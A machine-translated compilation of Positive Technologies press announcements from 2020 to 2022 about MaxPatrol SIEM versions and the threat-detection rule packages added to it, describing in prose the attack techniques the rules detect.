The MaxPatrol SIEM information security event monitoring system has received an update to previously downloaded examination packages to identify techniques for hiding attackers and signs of known hacker tools. Detection rules are aimed at detecting advanced methods of masking cybercriminals in the infrastructure and the activity of frameworks often used in targeted attacks. This was announced by Positive Technologies on September 23, 2022.

Attackers are constantly modifying their tools, techniques and attack methods, as well as developing ways to bypass security tools and hide their presence in the infrastructure of compromised companies. MaxPatrol SIEM included 42 rules added to previously downloaded examination packages. They allow MaxPatrol SIEM users to identify the most current attack techniques and ways to mask malicious activity. Among them, in particular:

  • using the Cobalt Strike framework: used by attackers to manage the seized infrastructure - post-exploitation of vulnerabilities, horizontal movement within the organization's network, fixation on resources and development of presence;
  • Shadow RDP Session Hidden Connection: Used by attackers to monitor user activity during an RDP session to obtain data (for example, to determine how a person works and what characteristic risks can be performed)
  • updated and less well-known techniques for gaining access for cybercriminals to the lsass.exe process, where credentials are stored;
  • tactics techniques "Moving inside the perimeter" according to the MITRE  ATT&CK model: attackers use them to gain access and manage remote systems on the network, install malware and gradually expand their presence in the infrastructure.

File:Aquote1.png
The attackers' techniques and tools are actively developing, and with them the means of defense, which must be regularly replenished with up-to-date expertise to counter such methods of attacks. Studies of cyber threats and well-known hacker frameworks show that attackers in 2022 are paying more and more attention to masking: knowing the current detection methods, they invent others that make it as difficult as possible to detect malicious activity. This means that it is necessary to study the events of information security more deeply and thoroughly than before. For example, the Sysmon 10 event indicates that attackers are trying to obtain credentials through access to the memory of the lsass.exe process. To identify this cyber threat, information security tools are sharpened exclusively for catching this event. However, attackers have modernized techniques to gain access to this process so as to exclude direct access to lsass.exe memory and the generation of a Sysmon 10 event. Such, say, advanced techniques can no longer be detected in classical ways, so we have written additional rules covering updated concealment methods. The updates will help MaxPatrol SIEM users identify suspicious activity in a timely manner and prevent the development of an attack.
commented Kirill Kiryanov, a leading specialist in the department of expert services for the development of the Positive Technologies Security Expert Center (PT ESC).
File:Aquote2.png

To start using the added rules, you need to upgrade the product to version 7.0 and install the rules from the examination package.

Add Active Directory Attack Detection Rules

Positive Technologies announced on August 1, 2022 that the MaxPatrol SIEM information security event monitoring system received an updated examination package. It allows you to identify ten more signs of malicious activity with more accuracy and fewer false positives - thanks to integration with MaxPatrol VM and PT Network Attack Discovery (PT NAD).

The added rules are detected attacks on Active Directory using DCShadow and DCSync techniques, the use of the Bloodhound utility by attackers to conduct reconnaissance domain and collect user domain records, attempts to exploit from the vulnerabilities CVE database and other dangerous actions.

The added examination package contains correlation rules based on analyzing network traffic using PT Network Attack Discovery, as well as collecting information about IT assets in MaxPatrol VM. Together, the products provide a more complete picture of the IT infrastructure, and the ability to enrich incidents with context from other systems increases the accuracy and speed of detecting attacks inside the protected perimeter.

File:Aquote1.png
Updated threat detection rules in MaxPatrol SIEM will help you detect current attack scenarios inside the perimeter and stop attackers before unacceptable business events occur. In addition, with this examination package, users receive tight integration of MaxPatrol SIEM with the PT Network Attack Discovery (PT NAD) behavioral traffic analysis system and the MaxPatrol VM vulnerability management solution. This will simplify the work on detecting anomalies in the infrastructure, specialists will be able to use the bundle of Positive Technologies products more efficiently than before. For example, now you can see in the MaxPatrol SIEM interface all the data necessary to investigate incidents, and not search for them yourself on the timeline, you can follow the associated links to the relevant event cards in other products.
noted Danil Spiridonov, specialist in the knowledge base development department, Positive Technologies.
File:Aquote2.png

The added rules will help information security specialists conduct a more detailed investigation of incidents. By analyzing server logs and signatures, that is, using data obtained from PT NAD, MaxPatrol SIEM detects:

  • Attacks using DCShadow and DCSync techniques. Their special implementation will allow attackers to obtain domain user accounts.
  • Transferring DNS zone from DNS server. Using a DNS zone dump, an attacker can get additional information about the structure of the attacked network.
  • Using the Bloodhound utility. MaxPatrol SIEM detects the launch of this program, and PT NAD for network traffic analysis determines that the utility has begun to collect user domain records on the compromised node.
  • The use by attackers of the Discovery technique, which can be a sign of studying the configuration of the network, accounts, etc.
  • Attempts to exploit CVE-2021-42287 vulnerabilities (user account name substitution) and CVE-2021-42278 (key center deception) in the Active Directory directory service, which allow attackers to seize control of Windows domains.
  • Suspicious network activity from one node to many nodes, which can indicate network scanning and moving an attacker inside the perimeter.
  • Abnormal network activity of several infected nodes, directed to one specific node, which may be outside the perimeter of the organization.
  • The use of hacker utilities, including for tunneling traffic (they are used by cybercriminals to bypass security tools and transmit malware traffic).
  • Activation of compromise indicators (IoC) compiled by safety the Positive Technologies Expert Security Center (PT Expert Security Center) based on continuous monitoring of current, cyber threats investigations of complex information security incidents in companies of various profiles, as well as on the basis of an analysis of techniques and grouping tools APT. This will allow MaxPatrol SIEM users to react to abnormal activity (the system will show which node in the network the attack is developing from, which node was compromised) and prevent the development of an attack within the network in time.

Companies using, in addition to MaxPatrol SIEM and PT NAD, the MaxPatrol VM vulnerability management system will be able to identify cases when attackers exploit vulnerabilities with assigned CVE identifiers. MaxPatrol VM scans assets for vulnerabilities, MaxPatrol SIEM compiles a table with a list of nodes and their inherent vulnerabilities known for 2022 and entered into the CVE database, and PT NAD, in turn, detects in network traffic attempts to exploit a particular vulnerability on a particular node. This will automate the tasks of SOC analysts to work with threat alerts from PT NAD and with potential cases of exploitation of vulnerabilities, as well as eliminate false positives from Internet scanning bots. To start using the updated examination package, you need to upgrade MaxPatrol SIEM to version 7.0 and install rules from this package. Cross-references in products will appear automatically when the PT Knowledge Base, which is part of MaxPatrol SIEM, is updated.

Release of MaxPatrol SIEM 7.0

Positive Technologies announced on June 16, 2022 the release of an updated version of the MaxPatrol SIEM information security event monitoring system - 7.0. The main thing in the release is support for Linux operating systems, the ability to conduct distributed event searches to identify attacks on large geographically extensive infrastructures, as well as simplify the management of asset significance from the point of view of information security. MaxPatrol SIEM 7.0 received support for Linux operating systems. In 2020, more than 1 million were purchased licenses for, and OS Astra Linux the total number of organizations using this one is ON more than 4 thousand. Now the product can be deployed by government departments state corporations, entities CUES and organizations that already use Linux or switch to this software within the framework. import substitution The ability to install MaxPatrol SIEM on domestic OS distributions is especially relevant for the Russian companies in the current realities. The system also supports work with 10. Debian 

File:Aquote1.png
We have long felt the need for customers to use a single platform for all product components. This greatly simplifies the deployment and operation of the system, which is the main priority of the company in the development of its information security solutions. And support for domestic Linux distributions simplifies the fulfillment of import substitution requirements,
commented Roman Sergeyev, Product Development Manager MaxPatrol SIEM, Positive Technologies.
File:Aquote2.png

According to Positive Technologies, 15% of information security specialists attribute information security monitoring in subordinate divisions to the most time-consuming actions in the SIEM system. This problem is characteristic primarily of organizations with a large geographically extensive infrastructure. With distributed event search, MaxPatrol SIEM users see the big picture of information security and can quickly identify complex non-typical attacks aimed at the infrastructure of both an individual unit and the entire enterprise as a whole. Events from all installations are available to the head-end operator for searching, filtering, grouping, aggregation and issuing reports on them. Nodes of the network infrastructure, the number of which is in the tens and hundreds of thousands, differ in terms of information security in terms of importance. To ensure that operators are not unnecessarily distracted by less important assets, MaxPatrol SIEM 7.0 adds the ability to assign value to assets using a policy. For example, all domain controllers can be assigned a high level of significance - the function works automatically, which saves MaxPatrol SIEM users from routine operations. In this case, at any time you can manually override the significance of the asset. Starting with version 7.0, the product supports the event store, specially developed by Positive Technologies, LogSpace. Its use increases the efficiency of using disk resources by 5-7 times. Thus, MaxPatrol SIEM users can either reduce their hardware costs or increase event storage depth with the same resources they previously had. In addition, customers still have the opportunity to use the usual Elasticsearch storage. In addition, MaxPatrol SIEM 7.0 improves the performance of a correlator responsible for detecting malicious activity: optimized RAM consumption, increased bandwidth and added the ability to use multiple processor cores. Queries to filter events are now saved in history and are reusable. This change is especially useful for SIEM system operators when testing hypotheses using PDQL queries during investigations.

File:Aquote1.png
MaxPatrol SIEM 7.0 is a long-awaited release. It combines updates that affect system changes (for example, the ability to use Linux operating systems, including certified versions, and the transition to a proprietary database that meets client requests for processing significant event flows) and architectural - horizontal scaling for distributed event search. Also in this version of the system there are many improvements that increase the convenience of the operational work of information security analysts investigating cybersecurity incidents. The MaxPatrol SIEM development team has done significant work to effectively use the product in distributed environments of large enterprise customers,
confirmed Elman Beibutov, Head of Information Security Event Monitoring at Positive Technologies.
File:Aquote2.png

2021

Release of an expertise package to identify attacks on MySQL DBMS

Positive Technologies On December 2, 2021, it announced that SIEM another examination package with a set of threat detection rules was loaded into the MaxPatrol incident detection system. By installing the package, users will be able to detect suspicious activity DBMS MySQL in Enterprise Edition. This will allow specialists to quickly localize attacks and prevent data breaches or disable DBMS.

According to 78% of information security specialists (information security) in Russia, the main goal that attackers pursue by attacking their companies is the theft of valuable information. In the second quarter of 2021, hackers stole: personal data 36% of attacks, trade secrets 22%, customer databases 3%. Companies can store such information in database management systems.

Photo: ptsecurity.com

MySQL is the second most popular DBMS in the world. Positive Technologies specialists studied how MySQL Enterprise Edition attacks and created an examination package with rules for detecting the actions of attackers. This package is the fifth in a row aimed at identifying attacks on popular DBMS. In August 2021, MaxPatrol SIEM loaded rule sets to detect attacks on PostgreSQL, Oracle Database, Microsoft SQL Server and MongoDB.

File:Aquote1.png
'If an attacker gains access to the DBMS and goes unnoticed, he will be able to control the company's business processes, violate them if he wants, and moreover, this will allow him to expand the attack and compromise the entire local network, 'explains Kostyakov, a specialist in the security department of business systems and databases at Positive Technologies.
File:Aquote2.png

Thanks to these rules, MaxPatrol SIEM users will be able to identify cases when attackers:

  • trying to access the command execution environment using user-defined functions (UDF) - allow you to execute commands on the server through the database, as a result, attackers can take possession of the infrastructure or develop their attack;
  • clearing the list of blocked IP addresses, which can be used to bypass prohibitions on connection to the DBMS;
  • selecting a password for accounts with access to MySQL;
  • review the audit table for intelligence purposes, and from the table you can find out the IP addresses of users and indirectly their privileges, which can be used to develop an attack;
  • change user rights or delete accounts, for example, to restrict access administrators to the system.

In total, the examination package allows you to identify 21 suspicious actions in MySQL. In order to start using the expertise package to identify attacks on MySQL, you need to update MaxPatrol SIEM to version 6.1 or 6.2, and then set the rules from the expertise package.

Integration with Kolchuga-K IVC

Positive Technologies and Information Implementation Company on October 5, 2021 announced the completion of the integration of the MaxPatrol SIEM incident detection system with a firewall for protecting limited access data "Kolchuga-K IVC." Read more here.

Download packet to detect signs of compromise of firewalls, routers, and switches

On August 31, 2021, Positive Technologies announced that another examination package was loaded into the MaxPatrol SIEM incident detection system. It includes rules for detecting signs of compromise of firewalls, routers and switches. By compromising such network devices, attackers can quickly develop an attack inside the network and reach their targets.

By installing the examination package, MaxPatrol SIEM users will be able to identify indicators of compromise of Cisco ASA and Check Point firewalls with GAiA operating system, routers and MikroTik and Cisco switchboards with iOS operating system. The changed rules will allow you to quickly localize the attack before attackers change network access policies and gain access to closed segments.

The added MaxPatrol SIEM examination package included ten compromise indicators, including:

  • attempts to connect or successful connection to the Check Point GAiA management server using the SmartConsole utility from an untrusted network node (not included in the list of those from which device administration is allowed);
  • changing the logging settings on the Cisco ASA device, in which, in case of failure authentications , user logins are saved in the log in clear text - this will allow attackers to intercept credentials, data including passwords if the user mistakenly enters the password in the login field;
  • trying to connect to a MikroTik device from an untrusted node using the Winbox administration utility.

To identify some signs of compromise in network devices, users will use the PT Network Attack Discovery (PT NAD) traffic analysis system. PT NAD parses the content of network packets transmitted in traffic. Together, the products provide a more complete picture of the IT infrastructure and more accurately identify incidents:

  • Modify the configuration file on Cisco IOS devices from an untrusted network node
  • Large ICMP packet transmission, which can be used by attackers to transmit data, including payloads
  • attempts to exploit a critical vulnerability CVE-2018-0171 in Cisco Smart Install technology, which automates the initial boot process of the operating system image of some Cisco Systems switches. Using this vulnerability, an attacker can reboot network equipment, cause a temporary denial of service, or execute arbitrary code without authentication.

To start using this examination package, you need to update MaxPatrol SIEM to versions 6.1 or 6.2 and establish rules from the examination package.

MaxPatrol SIEM 6.2 with up to 60,000 events per second

Positive Technologies on August 24, 2021 announced the release of an updated version of the MaxPatrol SIEM incident detection system - 6.2. It will increase the data processing speed to 60,000 EPS, more quickly investigate all installations and distribute the stages of event collection and their subsequent processing between several MaxPatrol SIEM systems.

More than half of SIEM users are large companies with 1,000 to 10,000 employees or more, according to IDC. The capabilities of the updated version of MaxPatrol SIEM are especially relevant for organizations with a large geographically distributed infrastructure.

File:Aquote1.png
MaxPatrol SIEM identifies incidents in the largest Russian companies. Such organizations need to ensure security not only in the head office, but also in branches, - comments Alexey Andreev, Managing Director of Positive Technologies. - In order for companies to cover the entire hierarchical infrastructure as much as possible, we are systematically increasing the performance of MaxPatrol SIEM. Over the year, the processing speed increased 1.5 times.
File:Aquote2.png

To increase event storage performance and reduce hardware costs, MaxPatrol SIEM 6.2 users can migrate to a hybrid storage scheme. In this case, the last daily indices will be written to high-speed solid-state drives (SSDs) and over time will be gradually rewritten to more affordable hard disk drives . This allows you to increase the speed of processing events while simultaneously executing search queries.

Among the most laborious tasks when working with SIEM systems, 15% of information security specialists note monitoring of the information security situation in subordinate departments. In version 6.2, MaxPatrol SIEM users can quickly identify signs of attacks on the infrastructure of the entire enterprise. To do this, a distributed event search is available to the head site operator, which allows you to filter events of all subordinate sites at once and see the overall information security picture. Previously, the user could only search for events within individual installations. Now events from all sites at once are available for grouping, aggregation, displaying on widgets and issuing reports on them.

Image:Настройка распределённого поиска событий в инфраструктуре с двумя подчиненными площадками.png

Organizations with complex, branched structures may need to distribute the event collection steps and their subsequent processing across multiple MaxPatrol SIEM systems. For example, to handle events with different sets of normalization rules, or for optimal load balancing between servers. As of Release 6.2, users can use multiple MaxPatrol SIEM systems to process the same event flow: one system will collect events centrally, and others will process events afterwards.

From the previous version of MaxPatrol SIEM supports installation on Debian 10, from release 6.2 (24.1) support for Debian 9 is discontinued.

Loading an Expertise Package to Detect Attacks on Oracle Solaris

On June 29, 2021, Positive Technologies announced that an expertise package has been added to the MaxPatrol SIEM incident detection system to identify attacks on the Oracle Solaris operating system. The threat detection rules in the package will allow users to identify the presence of an attacker in time and prevent a system malfunction.

File:Aquote1.png
Oracle Solaris is a Unix-like operating system that large companies often use to deploy automated process management systems, databases, such as Oracle Database, and web servers, comments Evgeny Polonsky, a specialist in the security department of Unix Positive Technologies systems. - By gaining access to the system from Oracle Solaris, attackers can manage it, even disable or damage it, and compromise data.
File:Aquote2.png

To help companies secure systems deployed on Oracle Solaris, Positive Technologies experts have developed ways to detect popular threats. They are combined into a single examination package. The rules in its composition detect the use of several techniques from the MITRE ATT&CK matrix, which are used by attackers for persistence, discovery and interaction with the command and control center. For example, MaxPatrol SIEM users can now identify:

  • Launch reverse shell and bind shell remote connectivity tools that are used by attackers to manage the target system.
  • the activity of utilities and automatic scripts running on behalf of web server accounts that attackers can use to obtain information about a compromised system and its network environment at the intelligence stage;
  • Start a service or client to set up a hidden link or network scan.
  • the activity of utilities that attackers use to create tunneled connections (attackers need them to create a communication channel with a compromised node).

To start using the new examination package, you need to update MaxPatrol SIEM to version 6.1 and set the rules from the examination package.

Loading an Expert Review Package to Detect Attacks on SAP NetWeaver Application Server Java

SIEM Another examination package has been loaded into the MaxPatrol incident detection system. This was Positive Technologies announced on May 28, 2021. It detects suspicious user activity in the NetWeaver SAP Application Server platform. Java The updated rules will help prevent intruders from accessing the SAP system in time, such as attacks denial of service and privilege escalation to the administrator level.

File:Aquote1.png
Many companies use SAP business applications to manage financial flows, product lifecycle, supplier and customer interactions, enterprise resources, and critical business processes. Therefore, the security of information stored in SAP systems is of great importance, and violation of its confidentiality can lead to catastrophic consequences for business, "said Stanislav Zavgorodny, a specialist in the security department of business systems and databases at Positive Technologies.
File:Aquote2.png

As of 2019, the vendor's share in the global business application market is 7.7%. The SAP NetWeaver Application Server platform serves as the SAP Business Application Server. Java contains the SAP Portal and SAP Process Integration, which integrates SAP- and other applications.

Positive Technologies experts have developed a special expertise package to identify attacks on SAP NetWeaver Application Server Java. It included 10 rules for detecting threats. The rules allow you to identify the use of several attack techniques from the MITRE ATT&CK matrix, which are used by attackers to elevate privileges, obtain credentials and affect compromised systems. For example, with this package, users can detect cases when attackers:

  • try to find a password for accounts;
  • Add a user to the SAP System Administrators group to elevate their privileges
  • Try to log on to SAP under the same account from different devices
  • Reset the password for one account several times within 5 minutes
  • implement a denial of service attack by intentionally entering incorrect passwords to user accounts to automatically block them.

To start using this examination package, you need to update MaxPatrol SIEM to version 6.1 and set the rules from the examination package.

Loading the examination package for detecting intruders in the MongoDB DBMS

The MaxPatrol incident detection system SIEM has been loaded with an expertise package that allows you to quickly detect the presence of attackers database management systems MongoDB in the Enterprise Server. Rules for identifying threats will help identify their activity at different stages attacks and prevent theft data and system failure. This was announced on April 27, 2021 by the company. Positive Technologies

According to the developer's research, data acquisition remains the main motive for cyber attacks on companies - among all cyber incidents, they account for 61%. Most often, attackers manage to take possession of personal data of organizations (32%), trade secrets (26%) and credentials (20%). This information can be stored in database management systems.

File:Aquote1.png
Often, due to incorrect configuration of the DBMS, MongoDB can become open, accessible from the global network for any user, - comments Jan Guber, specialist in the security department of business systems and databases, Positive Technologies. - In Russia, as of April 2021, there are about 1,600 publicly available MongoDB servers. Attackers can find such DBMSs using specialized search engines and easily take possession of confidential data in them. Due to the ease of accessing data, MongoDB servers remain in the crosshairs of hackers.
File:Aquote2.png

In order for MaxPatrol SIEM users, whose IT infrastructure has MongoDB Enterprise Server, to strengthen their level of security, Positive Technologies has released a special examination package.

The examination package includes rules for detecting attacks at the stages of privilege escalation, obtaining credentials, researching the system and affecting it. By installing the examination package, MaxPatrol SIEM users will be able to detect such suspicious actions as:

  • creating users with high privileges,
  • backing up or deleting databases
  • View user data and passwords
  • obtaining information about user roles,
  • connecting with popular penetration testing distributions,
  • multiple deletion of collections.

To start using the new examination package, you need to update MaxPatrol SIEM to version 6.1 and set the rules from the examination package.

MaxPatrol SIEM All-in-One License Release for Small Credit Institutions

Positive Technologies on April 8, 2021 issued a special license for the MaxPatrol SIEM All-in-One incident detection system for small credit institutions.

A third of all companies using SIEM are financial institutions, according to Positive Technologies. At the same time, the share of financial companies with a low budget for information security (from 2 to 5 million rubles per year) is 5%, from 5 to 10 million rubles - 19%. SIEM systems begin to be used by companies in the presence of a budget for information security over 10 million rubles a year.

File:Aquote1.png
With MaxPatrol SIEM All-in-One, credit organizations can detect real-time attacks and significantly strengthen the security of critical infrastructure. Even with a limited budget and regardless of the current level of maturity of information security, companies will be able to get a high-quality SIEM system that has proven itself among the players in the financial industry, "comments Natalia Kazankova, product marketing manager at Positive Technologies. - The product covers 108 technical measures GOST R 57580.1-2017 and is certified according to the requirements of the FSTEC of Russia.
File:Aquote2.png

Even small banks will now be able to ensure compliance with the National Standard of the Russian Federation GOST R 57580.1-2017 "Security of financial (banking) operations. Information protection of financial institutions. Basic set of organizational and technical measures. " Especially for companies in this area with a small IT infrastructure, Positive Technologies has released a license for 100 network nodes. Its cost ― 2.2 million rubles. The price is recommended for Positive Technologies authorized partners and can be reduced at their discretion.

The company recalled that from January 1, 2021, GOST R 57580.1-2017 became mandatory for all credit institutions (based on Bank of Russia Regulation No. 683-P of April 17, 2019).

To comply with GOST R 57580.1-2017, banks need SIEM systems, since they allow implementing the measures of the "Information Security Incident Management" process. This process includes 33 mandatory technical measures for monitoring and analyzing information protection events, detecting incidents and responding to them. In addition to process measures for managing information protection incidents, MaxPatrol SIEM All-in-One allows you to cover another 75 GOST technical measures.

Ability to identify intruders in the VMware vSphere platform

Users of the MaxPatrol SIEM 6.1 incident detection system can detect malicious activity in the VMware vSphere virtualization platform. Positive Technologies (Positive Technologies) announced this on February 19, 2021. This helps prevent data theft, security disruption, business process downtime, and other impacts of attacks on virtual infrastructure.

VMware is one of the developers of virtualization software. According to a study by Spiceworks, 79% of large businesses in the world use vSphere.

File:Aquote1.png
More than 90% of companies deploy the bulk of the server infrastructure in a virtual environment, "comments Kirill Antonenko, head of Unix security at Positive Technologies. - This is convenient, but associated with risk: problems may arise if attackers take over the vSphere account and gain access to the entire virtual infrastructure.
File:Aquote2.png

This examination package includes risk detection rules that can be implemented by attackers after accessing vSphere. The rules signal when attackers:

  • cloning critical ones, virtual machines such as controllers, domain-, VPN DNS-, or -. DHCPservers By copying such a machine, attackers can study it in detail and extract valuable data without attracting the attention of security tools;
  • Copy files from the hard drive of a critical virtual server

· * try to disable virtual machines that have information protection deployed or change their settings. This can help attackers hide their further actions from antiviruses, firewalls, SIEM systems.

Virtual machines with critical data and information protection systems MaxPatrol SIEM automatically determines by the roles assigned to them in the network and the software installed on them. The list of monitoring machines can be supplemented manually.

MaxPatrol SIEM 6.1

On February 16, 2021, the company Positive Technologies announced the admission of version 6.1 safety of the MaxPatrol SIEM incident detection system. It allows you to quickly find and update - IT assets with outdated, data to store incidents database PostgreSQL in and monitor the load of the correlator.

MaxPatrol SIEM 6.1

According to the company, earlier, when starting data collection, tasks for scanning the network were immediately distributed among agents. This could lead to uneven agent utilization and accumulation of queues from tasks. Tasks are now distributed to agents as their resources are released. As a result, agents are loaded more evenly and data on IT assets in the network are updated faster.

To keep IT infrastructure information up-to-date, MaxPatrol SIEM 6.1 users can set the expiration date for asset information. You can track assets with irrelevant data using a special widget and asset filtering.

When investigating incidents, it is important to track changes in IT assets. Previously, filtering by database allowed you to see data on assets only as of the moment. To search for information about their condition, you had to go to the card of each individual asset. In MaxPatrol SIEM 6.1, you can specify a specific moment or time period in the past in the search bar by providing special fields in the interface and PDQL queries.

Identified security incidents in MaxPatrol SIEM are now stored in the PostgreSQL database management system. Previously, the product used SQL Server DBMSicrosoft, which limited the size of the database to 10 GB. When this volume was reached, you had to manually clean the database or buy a license for SQL Server without a limit. With the transition to PostgreSQL, MaxPatrol SIEM users are not limited in the amount of incident information that can be stored and processed in the product.

File:Aquote1.png
We chose the PostgreSQL DBMS because it is cross-platform, works on both Windows and Linux. This is important because in the next version of MaxPatrol SIEM, we plan to enable users to fully install the product on Linux.

told Alexey Andreev, Managing Director of Research and Development at Positive Technologies
File:Aquote2.png

MaxPatrol SIEM 6.1 has additional features for working with dashboards. Users can now place any number of widgets on the dashboard in optimal order. Widget width can be changed. Also, dashboards can now be shared with colleagues. To do this, the dashboard must be saved as a template that other users of the current MaxPatrol SIEM installation can use. Another change is the appearance of two new widgets that allow you to control the number of assets without a specified level of significance and the relevance of information about assets (you must first set the expiration date).

MaxPatrol SIEM 6.1 has added event fields related to user authentication, account and group actions, process startup, and query execution. You can start using them in event normalization rules and risk detection rules (correlation rules).

MaxPatrol SIEM 6.1 defines correlation rules that consume the most RAM and additionally load the correlator. This allows you to understand which rules should be rewritten or adjusted so that they work more accurately - without waiting a long time for the missing triggering conditions.

MaxPatrol SIEM 6.1 supports importing data into the PT Knowledge Base, updated versions of the search engine Elasticsearch and. operating system Debian The product is updated and installed 25% faster by optimizing the installer.

2020

Loading the examination package to detect suspicious activity in the PostgreSQL DBMS

The MaxPatrol incident detection system SIEM has been replenished with an examination package to identify suspicious activity in. database management systems PostgreSQL This was announced on November 5, 2020 by the company. Positive Technologies

The rules in the package will help users quickly detect intruders and prevent data theft and system outage.

PostgreSQL is the third most common DBMS the Russian state institutions in large companies; in 2019, it was used in 51% of such organizations. According to Positive Technologies, obtaining data was the main motive for the actions of cybercriminals in the second quarter of 2020. Most often, accounting and personal data information related to commercial secrets databases and customers are stolen - such information accounted for 80% of thefts. Such data is usually contained in database management systems, so DBMSs often become the target attacks of attackers.

For MaxPatrol SIEM users whose infrastructures have PostgreSQL DBMS, the R&D Positive Technologies team has released an examination package with rules for detecting attacks carried out using queries to the DBMS. The rules help detect suspicious activities such as:

  • sending commands to determine the version of the database (indicates the beginning of an attack on the DBMS),
  • reading tables containing hash sums, passwords
  • disabling the audit,
  • changing the importance level of audit messages to hide actions,
  • changing the authentication method to increase the likelihood of compromising the user or role in the system,
  • disabling the row protection policy for the table
  • Disable Data Link Encryption (SSL)
  • reboot the server configuration,
  • running built-in applications of the operating system with the ability to execute arbitrary commands.

Each of these actions requires investigation.

This is the third examination package in MaxPatrol SIEM, created to detect suspicious activity in the DBMS. Previously, MaxPatrol SIEM loaded rule sets to detect attacks on Oracle Database and Microsoft SQL Server.

Third examination package for detecting attacks on Linux operating systems

The MaxPatrol SIEM incident detection system has a third examination package loaded to identify attacks on Linux operating systems. It will detect actions that may indicate a compromise of the system and the development of an attack on the organization's IT infrastructure, Positive Technologies reported on August 24, 2020 .

The next series of rules complements the two previous examination packages on Linux systems: to identify suspicious network activity and changes in system objects. The package includes threat detection rules that allow MaxPatrol SIEM users to identify local intelligence when logging into a Linux system, view the contents of other people's home directories, run commands to elevate privileges, and use hacker utilities to further develop the attack.

Linux is a popular operating system in the markets of cloud services, supercomputers, and web servers. According to a study by W3Techs, Linux supports 70% of websites out of the most popular 10 million domains by Alexa rating. Such servers can become a point of penetration of attackers into the organization's network if there are vulnerabilities in the web applications deployed on them.

File:Aquote1.png
"The presented examination package is an expansion of the MITRE ATT&CK matrix coverage and strengthening another layer of protection for Linux systems," said Kirill Antonenko, head of the family Unix, Technologies systems security department. - Attackers can get into the system in various ways that are difficult to distinguish from legitimate user actions and that do not trigger SIEM systems. But if they start conducting local reconnaissance, trying to elevate privileges, gain a foothold in the system or develop an attack, the correlation rules in the last two packages will help identify and stop the attack in time. "
File:Aquote2.png

The expertise package is available to MaxPatrol SIEM version 6.0 users. The package is installed automatically when the Positive Technologies Knowledge Base is updated.

Integration with Dr.Web Enterprise Security Suite 9-12

Companies using the complex's products Dr.Web Enterprise Security Suite and detecting incidents INFORMATION SECURITY using MaxPatrol SIEM will be able to connect Dr.Web solutions of current versions as sources for data security monitoring. This was announced on August 5, 2020 by the company. Positive Technologies More. here

Download a package to detect suspicious events from network devices

The twentieth examination package has been loaded into the MaxPatrol SIEM incident detection system. This was announced on July 23, 2020 by Positive Technologies. It allows you to identify seven suspicious events analysis activities from network devices. This will help MaxPatrol SIEM users quickly localize attacks before data leaks, hardware outages, or malware launches.

Event sources can be routers and, with switchboards Cisco firewalls Check Point operating system GAiA,,, Cisco ASA FortiGate PAN-OS Palo Alto Networks , Juniper Junos OS. MaxPatrol SIEM now detects the following potentially dangerous network activities:

  • Attempts to exploit the vulnerability CVE-2018-0156 in Cisco Smart Install technology, which automates the initial boot process of the operating system image of some Cisco Systems switches. Using this vulnerability, an attacker will be able to reboot network equipment without authentication, change its settings and cause a temporary denial of service.
  • Connecting to third-party mail services. Such actions may be prohibited by organization security policies.
  • FHRP family protocol authentication errors (primary gateway protection protocols). The error occurs when a misconfiguration on network equipment or an attack on the FHRP protocol occurs. A successful implementation of the attack will allow an attacker to gain access to the network traffic of the organization.
  • Query SNMP information. This event indicates that the attacker is trying to find a password to access the equipment or get information about the enterprise network.
  • Fragmented UDP traffic. Fragmentation is often used when trying to bypass attack detection systems, so fragmented packets are subject to filtering.
  • Connection to external VPNto servers-. The organization of tunnels from the corporate network may indicate a perimeter violation and attempts by the attacker to transfer information to the outside from the attacked node.
  • Use of third-party DNS servers. Using DNS, attackers can redirect traffic to their resources. DNS can also be used as a malicious control channel. ON

File:Aquote1.png
Network attacks are not very popular with attackers due to the difficulty of executing them. However, in our experience, they meet as one of the stages of a targeted attack and pose a serious threat to organizations in their consequences, - comments Mikhail Pomzov, Director of the Knowledge Base and Expertise Department of Positive Technologies. - Previously, MaxPatrol SIEM downloaded a package that allows you to detect network anomalies when working remotely. Now MaxPatrol SIEM covers even more intruder tactics. Our plans are to gradually expand the set of correlation rules to identify abnormal network activity.
File:Aquote2.png

Download the Privilege Escalation and Control Malware Detection Package

The MaxPatrol SIEM incident detection system is loaded with an expertise package that allows you to identify attackers at the stage when they communicate with attacked machines or try to elevate privileges in the system to the administrator level in order to develop an attack. This was announced on June 29, 2020 by Positive Technologies (Positive Technologies).

The rules included in the nineteenth examination package detect the use of the techniques "Privilege escalation" and "Command and control" according to the MITRE ATT & CK2 model. The current examination package is the sixth package with attack detection rules according to the MITRE ATT&CK model; a total of 12 tactics are described in the ATT&CK matrix.

File:Aquote1.png
The use of privilege escalation techniques speaks of attempts by attackers to obtain higher-level resolutions in the attacked system. To do this, they exploit configuration errors and vulnerabilities. "Management and Control" techniques are used when attackers need to contact controlled systems in the victim's network, - comments Anton Tyurin, head of the department of expert security services at Positive Technologies (PT Expert Security Center). - To hide traces, attackers mimic the usual behavior in traffic, use the built-in tools of operating systems. The presented examination package will help specialists detect these actions and take action in time.
File:Aquote2.png

The examination package includes detection rules that help identify the following suspicious actions: creating a malicious library, launching executable files on behalf of another user, launching a command line on behalf of the system, downloading and launching malware, proxying ports, an illegitimate Internet connection coming from executable files. Timely identification of these actions will prevent further progress of attackers and will prevent them from gaining a foothold in the infrastructure.

Also, Positive Technologies experts have updated the examination packages covering execution and persistence tactics. Users will now be able to identify attempts by attackers to use standard Windows applications for illegitimate actions and spoofing or modifying the executable file.

Appearance in MaxPatrol SIEM 6 checklist for quick product setup

On June 23, 2020, Positive Technologies announced the release of the sixth version of the MaxPatrol SIEM security incident detection system. Product developers continue to reduce the labor costs of specialists to work in SIEM systems. To do this, they added a checklist to the next version to customize the product, made it easier to work with false positives and improved notifications.

According to a survey by Positive Technologies, 25% of specialists spend two to four hours daily in SIEM systems, and 22% of respondents spend more than half of the working day. Moreover, 62% of respondents noted that over the past year this time has increased.

File:Aquote1.png
Over the past year, our efforts are aimed at ensuring that the product receives as many functions as possible to reduce the requirements for specialists to work with the product and reduce their labor costs. To do this, in particular, we supply the product with examination packages with ready-made correlation rules on a monthly basis, added a designer to write our own rules, and in the new version released a checklist to configure the system and simplified work with false positives,

- comments Alexey Andreev, Managing Director of the Research and Development Department of Positive Technologies
File:Aquote2.png

In order for MaxPatrol SIEM users to be able to get a running system without studying a lot of documentation, a configuration checklist appeared in the next version. It has 11 steps required to start the system. For each step, there is an instruction to follow and links to the detailed materials.

